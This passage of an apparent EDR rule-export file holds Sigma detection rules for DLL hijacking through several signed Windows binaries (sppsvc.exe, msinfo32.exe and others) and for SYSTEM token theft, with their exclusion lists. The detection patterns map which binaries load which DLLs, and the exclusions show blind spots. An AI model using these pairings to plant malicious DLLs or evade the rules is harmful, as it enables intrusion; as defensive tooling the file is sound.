"creation_date": "2026-03-23T11:45:34.080548Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080552Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sppsvc.yml",
"content": "title: DLL Hijacking via sppsvc.exe\nid: 16a70c78-b3ad-445a-bef6-ca597bfdb2b3\ndescription: |\n Detects potential Windows DLL Hijacking via sppsvc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sppsvc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTXML.dll'\n - '\\pkeyhelper.dll'\n - '\\webservices.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "16a70c78-b3ad-445a-bef6-ca597bfdb2b3",
"rule_name": "DLL Hijacking via sppsvc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sppsvc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "16ac2b82-bf41-4651-832f-0b67481cbba0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596042Z",
"creation_date": "2026-03-23T11:45:34.596046Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596053Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/incognito/incognito.c",
"https://attack.mitre.org/techniques/T1134/"
],
"name": "t1034_possible_system_access_token_theft.yml",
"content": "title: Possible SYSTEM Access Token Theft\nid: 16ac2b82-bf41-4651-832f-0b67481cbba0\ndescription: |\n Detects the suspicious creation of a process with SYSTEM privileges by a High Integrity process.\n This can be indicative of token theft from a SYSTEM process in order to locally elevate privileges.\n It is recommended to analyze the behavior and content of both the parent and the child process to search for malicious actions.\nreferences:\n - https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/incognito/incognito.c\n - https://attack.mitre.org/techniques/T1134/\ndate: 2023/06/20\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1134.001\n - attack.t1134.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n IntegrityLevel: 'System'\n ParentIntegrityLevel: 'High'\n\n exclusion_teamviewer:\n - ParentImage|endswith:\n - '?:\\ProgramData\\GenapiTV\\TeamViewer.exe'\n - '\\TeamViewer\\TeamViewer.exe'\n - '\\TeamViewerPortable\\TeamViewer.exe'\n - '\\AppData\\Local\\TeamViewer\\CustomConfigs\\\\*\\TeamViewer.exe'\n - '\\AppData\\Roaming\\TeamViewerMeeting\\TeamViewerMeeting.exe'\n - '\\AppData\\Local\\Temp\\TeamViewer\\Version?\\TeamViewer.exe'\n - '\\AppData\\Local\\Temp\\\\*\\TeamViewer\\Version?\\TeamViewer.exe'\n - ProcessParentOriginalFileName: 'TeamViewer.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature:\n - 'TeamViewer Germany GmbH'\n - 'TeamViewer GmbH'\n\n exclusion_mssql:\n ParentImage|endswith: '\\MSSQL\\Binn\\sqlservr.exe'\n\n exclusion_anydesk:\n - ParentImage|endswith:\n - '\\AnyDesk.exe'\n - '\\AnyDesk????.exe'\n - '\\AnyDesk_????.exe'\n - ProcessParentDescription: 'AnyDesk'\n ProcessParentSigned: 'true'\n ProcessParentSignature:\n - 'AnyDesk Software GmbH'\n - 'philandro Software GmbH'\n\n exclusion_werfault:\n 
Image: '?:\\Windows\\System32\\WerFault.exe'\n\n exclusion_advanced_run:\n ParentImage|endswith: '\\AdvancedRun.exe'\n\n exclusion_prohelp:\n ParentImage:\n - '?:\\Program Files\\Mattec\\ProHelp\\bin\\moller.exe'\n - '?:\\Program Files (x86)\\Mattec\\ProHelp\\bin\\moller.exe'\n\n exclusion_etdctrl:\n ParentImage: '?:\\windows\\system32\\ETDCtrl.exe'\n\n exclusion_rg_systemes_assist:\n OriginalFileName:\n - 'RG_Supervision.exe'\n - 'Assist.exe'\n Signed: 'true'\n Signature: 'RG Systèmes SAS'\n\n exclusion_conhost:\n Image: '?:\\Windows\\System32\\conhost.exe'\n\n exclusion_vmmem:\n ParentImage:\n - 'vmmem'\n - 'vmmemWSL'\n\n exclusion_taskkill:\n # taskkill /IM msedge.exe /F\n # taskkill /IM TDMon.exe\n CommandLine|startswith: 'taskkill /IM '\n ParentCommandLine|startswith: '?:\\Windows\\SysWOW64\\inetsrv\\w3wp.exe -ap DefaultAppPool -v '\n GrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k iissvcs'\n\n exclusion_ninite:\n CommandLine|contains: '\\AppData\\Local\\Temp\\\\????????-????-????-????-????????????\\Ninite.exe /runsetup ????????-????-????-????-????????????'\n ParentImage|endswith: '\\Ninite.exe'\n\n exclusion_dell_remote_assist:\n OriginalFileName: 'DellRemoteAssist.exe'\n Signed: 'true'\n ProcessParentOriginalFileName: 'DellRemoteAssist.exe'\n ProcessParentSigned: 'true'\n CommandLine|contains:\n - 'startup=runSystem'\n - 'startup=runElevated'\n - 'startup=systemBaseClient'\n\n exclusion_securityhealthsetup:\n ProcessImage: '?:\\Windows\\SoftwareDistribution\\Download\\Install\\securityhealthsetup.exe'\n Signed: 'true'\n\n exclusion_rustdeck1:\n OriginalFileName: 'rustdesk.exe'\n CommandLine|contains: ' --run-as-system'\n\n exclusion_rustdeck2:\n OriginalFileName: 'rustdesk.exe'\n Signed: 'true'\n Signature: 'Zhou Huabing'\n\n # https://www.navista.fr/support-technique/\n exclusion_navista:\n OriginalFileName: 'rustdesk.exe'\n Signed: 'true'\n Signature: 'PURSLANE'\n\n exclusion_ansible:\n CommandLine: 'powershell.exe -NonInteractive -NoProfile 
-ExecutionPolicy Bypass -EncodedCommand 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'\n\n exclusion_paragon:\n ProcessImage: '?:\\Program Files\\Paragon Software\\Paragon Backup and Recovery\\program\\hdmengine_scriptsapp.exe'\n Signed: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "16ac2b82-bf41-4651-832f-0b67481cbba0",
"rule_name": "Possible SYSTEM Access Token Theft",
"rule_description": "Detects the suspicious creation of a process with SYSTEM privileges by a High Integrity process.\nThis can be indicative of token theft from a SYSTEM process in order to locally elevate privileges.\nIt is recommended to analyze the behavior and content of both the parent and the child process to search for malicious actions.\n",
"rule_creation_date": "2023-06-20",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1134.001",
"attack.t1134.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "16bd5dca-1018-431d-b375-f0bec118e825",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077520Z",
"creation_date": "2026-03-23T11:45:34.077522Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077527Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_appvshnotify.yml",
"content": "title: DLL Hijacking via AppVShNotify.exe\nid: 16bd5dca-1018-431d-b375-f0bec118e825\ndescription: |\n Detects potential Windows DLL Hijacking via AppVShNotify.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'AppVShNotify.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\userenv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "16bd5dca-1018-431d-b375-f0bec118e825",
"rule_name": "DLL Hijacking via AppVShNotify.exe",
"rule_description": "Detects potential Windows DLL Hijacking via AppVShNotify.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "16c5e5af-a716-4159-bbc4-d614187f5564",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590369Z",
"creation_date": "2026-03-23T11:45:34.590373Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590383Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dpiscaling.yml",
"content": "title: DLL Hijacking via dpiscaling.exe\nid: 16c5e5af-a716-4159-bbc4-d614187f5564\ndescription: |\n Detects potential Windows DLL Hijacking via dpiscaling.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dpiscaling.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\iphlpapi.dll'\n - '\\ndfapi.dll'\n - '\\PROPSYS.dll'\n - '\\shell32.dll'\n - '\\wdi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "16c5e5af-a716-4159-bbc4-d614187f5564",
"rule_name": "DLL Hijacking via dpiscaling.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dpiscaling.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "16d32dde-ef35-4e0e-91a8-466d49409ba8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075187Z",
"creation_date": "2026-03-23T11:45:34.075189Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075194Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wlbs.yml",
"content": "title: DLL Hijacking via WLBS.exe\nid: 16d32dde-ef35-4e0e-91a8-466d49409ba8\ndescription: |\n Detects potential Windows DLL Hijacking via WLBS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WLBS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "16d32dde-ef35-4e0e-91a8-466d49409ba8",
"rule_name": "DLL Hijacking via WLBS.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WLBS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "16e0ffc8-8668-4969-8fe3-840080ccc099",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587639Z",
"creation_date": "2026-03-23T11:45:34.587643Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587650Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bootcfg.yml",
"content": "title: DLL Hijacking via bootcfg.exe\nid: 16e0ffc8-8668-4969-8fe3-840080ccc099\ndescription: |\n Detects potential Windows DLL Hijacking via bootcfg.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bootcfg.exe'\n ImageLoaded|endswith:\n - '\\mpr.dll'\n - '\\netapi32.dll'\n - '\\sspicli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "16e0ffc8-8668-4969-8fe3-840080ccc099",
"rule_name": "DLL Hijacking via bootcfg.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bootcfg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "171739c5-ffb8-48b2-8e6d-e688af5f311b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587540Z",
"creation_date": "2026-03-23T11:45:34.587544Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587552Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msinfo32.yml",
"content": "title: DLL Hijacking via msinfo32.exe\nid: 171739c5-ffb8-48b2-8e6d-e688af5f311b\ndescription: |\n Detects potential Windows DLL Hijacking via msinfo32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msinfo32.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\fastprox.dll'\n - '\\mfc42u.dll'\n - '\\powrprof.dll'\n - '\\SLC.dll'\n - '\\sppc.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "171739c5-ffb8-48b2-8e6d-e688af5f311b",
"rule_name": "DLL Hijacking via msinfo32.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msinfo32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "17d344bd-5969-438e-b896-775f30a96618",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
